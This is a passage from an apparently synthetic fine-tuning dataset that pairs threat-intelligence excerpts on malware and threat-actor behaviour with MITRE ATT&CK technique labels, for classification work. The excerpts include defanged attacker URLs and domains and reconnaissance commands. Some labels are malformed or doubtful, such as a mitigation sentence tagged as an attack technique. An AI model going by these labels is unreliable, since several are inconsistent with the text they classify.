directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection." }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses port 46769 for C2." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "achieves persistence by creating a shortcut in the current user's Startup folder." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig can download and run batch files to execute commands on a compromised host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, Pay2Key is reading the Server and Port keys from the configuration file. If a configuration file was not found in the current working directory and wasn’t supplied in the command line arguments, the ransomware will write “no config file found” to a file at .\\Cobalt-Client-log.txt. This log file will be used extensively by the ransomware during its execution. Newer versions of the ransomware are making sure to remove this log file from the disk. The full list of supported log messages can be found in the appendix section of this article" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can add a certificate to the Windows store." }, { "role": "assistant", "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses SSL to encrypt its communication with its C2 server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can open a command-line interface." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteUtilities can take screenshots on a compromised host." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used company extranet servers as secondary C2 servers." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dipsind can spawn remote shells." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After using raw sockets to communicate with its C2 server, uses a decrypted string to create HTTP POST requests." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used a Word Template, Normal.dotm, for persistence." }, { "role": "assistant", "content": "T1137.001 - Office Application Startup: Office Template Macros." } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee has gained execution through luring users into opening malicious attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DCSrv has masqueraded its service as a legitimate svchost.exe process." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has the ability to check if \"/usr/sbin/setenforce\" exists. This file controls what mode SELinux is in." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GeminiDuke collects information on network settings and Internet proxy settings from the victim." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has acquired C2 domains, sometimes through resellers." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk can remotely create a scheduled task to execute itself on a system." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Researchers also observed that the backdoor downloads and executes the Cobalt Strike pentesting and post-exploitation toolkit on the victim's machine within some period of time after the infection. By deploying Cobalt Strike, it is clear that this stealthy backdoor is being used to gain a foothold in corporate networks so that ransomware can be deployed, data can be stolen, or network access could be sold to other threat actors" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs local network connection discovery using netstat." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An analysis of these files found that they all leveraged a remote template injection technique that allows the documents to pull down the malicious code once they are opened. This allows the attacker to have control over what content is sent back to the victim in an otherwise benign document. Recent examples of the remote template “dot” file URLs these documents use include the following" }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork leveraged the DDE protocol to deliver their malware." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks for sandboxing libraries and debugging tools." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additional mitigations that could help to prevent attacks like these from succeeding in your environment include: Changing the default handler for “.hta” files in your environment so that they cannot be directly executed.hta” files in your environment so that they cannot be directly executed" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KARAE can use public cloud-based storage providers for command and control." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. In our case the attacker abused cmstp to execute JavaScript scriptlet (XML with JS) that is downloaded from the e-dropbox[.]biz site. Although some security solutions will block all PureBasic programs (wrong move – there are plenty of legitimate PureBasic programs in use today), it’s a smart move made by the attacker group. The right side of the pair is the name of the JavaScript in the next stage (stage 4) , while the left side of the pair represents the file that will be downloaded as part of stage 5. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Stage 5 - JavaScript Backdoor . The last stage JavaScript is downloaded from hxxps://server.vestacp[.]kz/robots.txt. Organizations should expect to see much more coming from all Cobalt Group factions during the next year" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1203 - Exploitation for Client Execution', 'T1566 - Phishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of downloading files, including additional modules." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 can use protocols like HTTP/HTTPS for command and control traffic." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used encoded PowerShell commands." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential." }, { "role": "assistant", "content": "T1556.001 - Domain Controller Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate has the ability to enumerate fixed logical drives on a targeted system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first link was labeled as \"Comparison of Major Tasks in '16 & '17\" and the second link was identified as \"Comparison between '16 & '17\".Upon opening these links the user was presented with a further decoy Hangul document" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can Base32 encode chunks of output files during exfiltration." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Reaver variants use raw TCP for C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "adds an entry to the rc.common file for persistence." }, { "role": "assistant", "content": "T1037.004 - Boot or Logon Initialization Scripts: Rc.common" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leverages a custom packer to obfuscate its functionality." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proxysvc registers itself as a service on the victim’s machine to run as a standalone process." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly dropped and executed SecretsDump, a tool that dumps password hashes." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stores configuration values under the Registry key HKCU\\Software\\Microsoft\\[dllname] and modifies Registry keys under HKCR\\CLSID\\...\\InprocServer32with a path to the launcher." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali has been delivered as malicious e-mail attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer can use TCP to communicate with command and control servers." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy can collect keyboard events." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Linux can attempt to find a new C2 server if it receives an error." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT can communicate over a reverse proxy using SOCKS5." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "23 Take screenshot, temporarily store it as TPX499.dat, and upload it to the C2" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility. More information on this technique and the CARROTBAT malware family may be found within the Appendix" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"net group Exchange Trusted Subsystem /domain\" and \"net group domain admins /domain\"." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The stage’s 0x102 resource is parsed and the files are dropped in either %ProgramFiles% or %AppData% in the randomly chosen folder. The creation times are changed to have the same values as kernel32.dll" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Later in the execution chain, the SeLoadDriverPrivilege is used to load the extracted driver. Then one of the four drivers is dropped, after which the Volume Shadow Copy (VSS) service – which allows backups to be performed – is stopped" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used regsvr32.exe to execute scripts." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The MSIL file contains the packed core payload in its .Net resource section" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has had null characters padded in its malicious DLL payload." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor can use encrypted string blocks for obfuscation." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver collects the victim's IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ixeshe is capable of executing commands via cmd." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files: NOP sled composed of 0x90 and 0x91 opcodes The main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1027 - Obfuscated Files or Information', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan can use HTTPS for communication with C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication" }, { "role": "assistant", "content": "T1090.004 - Domain Fronting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A FinFisher variant uses DLL search order hijacking." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can decode its encoded PE file prior to execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Those files are then uploaded via unencrypted HTTP, one after another. Examining the network packets showed that they contained a string with two pieces of information: a file path and a random string of characters" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Panda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download a loader (Figure 1). Then, the loader downloads and executes the main stealer. " }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1137.001 - Office Application Startup: Office Template Macros." } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DropBook can download and execute additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has many names in the information security industry — it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them" }, { "role": "assistant", 